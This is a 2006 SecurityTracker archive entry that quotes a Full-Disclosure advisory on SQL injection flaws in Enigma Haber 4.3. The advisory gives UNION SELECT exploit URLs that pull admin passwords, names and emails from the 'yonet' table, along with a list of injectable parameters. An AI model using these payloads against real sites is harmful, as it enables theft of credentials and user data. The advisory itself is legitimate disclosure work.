SecurityTracker.com Archives - Enigma Haber Multiple Input Validation Holes Let Remote Users Inject SQL Commands

	Keep Track of the Latest Vulnerabilities with SecurityTracker!

SecurityTracker
Archives

Sign Up

Instant Alerts

Buy our Premium Vulnerability Notification Service to receive customized, instant alerts

Affiliates

Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!

Partners

Become a Partner and License Our Database or Notification Service

Report a Bug

Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com

Category: Application (Forum/Board/Portal) > *

Vendors: *

Enigma Haber Multiple Input Validation Holes Let Remote Users Inject SQL Commands

SecurityTracker Alert ID: 1016171

SecurityTracker URL: http://securitytracker.com/id?1016171

CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)

Date: May 29 2006

Impact: Disclosure of system information, Disclosure of user information, User access via network

Exploit Included: Yes

Version(s): 4.3

Description: A vulnerability was reported in Enigma Haber. A remote user can inject SQL commands.

The software does not properly validate user-supplied input in several scripts. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database.

Some demonstration exploit URLs are provided:

http://[target]/enigmadir/e_mesaj_yaz.asp?id=1879586820+UNIO N+SELECT+0,sifre,2,3,4,5,6,7,8,9,10,110,0,
0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+yonet+where+yonetid=1144931586

http://[target]/enigmadir/ara.asp?yo=1&ara=SQL&ko=0&k=0&d=hid &e=desc&ay=00&yil=00

http://[target]/enigmadir/arsiv.asp?d=hid&e=desc+UNION+SELECT+0,sifre,isim,3,4,5,6,7,8,9,10,11,12,13,14,
15,16,17,18,19+FROM+yonet+where+yonetid% 20like%201144927664&ay=00&yil=00&e_kad=00

http://[target]/enigmadir/admin/y_admin.asp?yid=34+UNION+SELECT+0,1,mail,3,4,5,sifre,isim,8,9,sehir+from+
yonet+where+yoneti d=1144927664

The vendor was notified on May 27, 2006.

A demonstration exploit is available at:

http://www.nukedx.com/?getxpl=34

Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI reported this vulnerability.

The original advisory is available at:

http://www.nukedx.com/?viewdoc=34

Impact: A remote user can execute SQL commands on the underlying database.

Solution: No solution was available at the time of this entry.

Vendor URL: www.enigmaasp.net/enigma_haber.asp (Links to External Site)

Cause: Input validation error

Underlying OS: Windows (Any)

Reported By: Mustafa Can Bjorn IPEKCI <nukedx@nukedx.com>

Message History: None.

Source Message Contents

Date: Sun, 28 May 2006 16:58:56 +0300
From: Mustafa Can Bjorn IPEKCI <nukedx@nukedx.com>
Subject: [Full-disclosure] Advisory: Enigma Haber <= 4.3 Multiple Remote SQL

 
--Security Report--
Advisory: Enigma Haber <= 4.3 Multiple Remote SQL Injection Vulnerabilities
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 27/05/06 05:16 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@nukedx.com
Web: http://www.nukedx.com
 
---
Vendor: EnigmaASP (http://www.enigmaasp.net/)
Version: 4.3 and prior versions must be affected.
About: Via this method remote attacker can inject arbitrary SQL  
queries to EnigmaHaber.See the examples.
Level: Critical
---
How&Example:
GET -> http://[site]/enigmadir/e_mesaj_yaz.asp?id=SQL
EXAMPLE ->  
http://[site]/enigmadir/e_mesaj_yaz.asp?id=1879586820+UNION+SELECT+0,sifre,2,3,4,5,6,7,8,9,10,110,0,
0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+yonet+where+yonetid=1144931586
GET -> http://[site]/enigmadir/yazdir.asp?hid=SQL
GET -> http://[site]/enigmadir/yorum.asp?hid=SQL
GET -> http://[site]/enigmadir/edi_haber.asp?id=SQL&tur=1
GET ->  
http://[site]/enigmadir/ara.asp?yo=1&ara=SQL&ko=0&k=0&d=hid&e=desc&ay=00&
yil=00
GET ->  
http://[site]/enigmadir/arsiv.asp?d=hid&e=desc[SQL]&ay=00&yil=00&e_kad=00
EXAMPLE ->  
http://[site]/enigmadir/arsiv.asp?d=hid&e=desc+UNION+SELECT+0,sifre,isim,3,4,5,6,7,8,9,10,11,12,1
3,14,
15,16,17,18,19+FROM+yonet+where+yonetid%20like%201144927664&ay=00&yil=00&e_kad=00
GET -> http://[site]/enigmadir/haber_devam.asp?id=SQL
Examples in the below needs admin rights.
GET -> http://[site]/enigmadir/admin/y_admin.asp?yid=SQL
EXAMPLE ->  
http://[site]/enigmadir/admin/y_admin.asp?yid=34+UNION+SELECT+0,1,mail,3,4,5,sifre,isim,8,9,sehir+fro
m+
yonet+where+yonetid=1144927664
GET -> http://[site]/enigmadir/admin/reklam_detay.asp?bid=SQL
GET -> http://[site]/enigmadir/admin/detay_yorum.asp?hid=SQL
GET -> http://[site]/enigmadir/admin/haber_sil.asp?hid=SQL
GET -> http://[site]/enigmadir/admin/kategori_d.asp?o=1&kid=SQL
GET -> http://[site]/enigmadir/admin/haber_ekle.asp?tur=SQL
GET -> http://[site]/enigmadir/admin/e_mesaj_yaz.asp?s=SQL
GET -> http://[site]/enigmadir/admin/admin_sil.asp?id=SQL
--
Timeline:
* 27/05/2006: Vulnerability found.
* 27/05/2006: Contacted with vendor and waiting reply.
---
Exploit: http://www.nukedx.com/?getxpl=34
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=34

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us | Help
Copyright 2006, SecurityGlobal.net LLC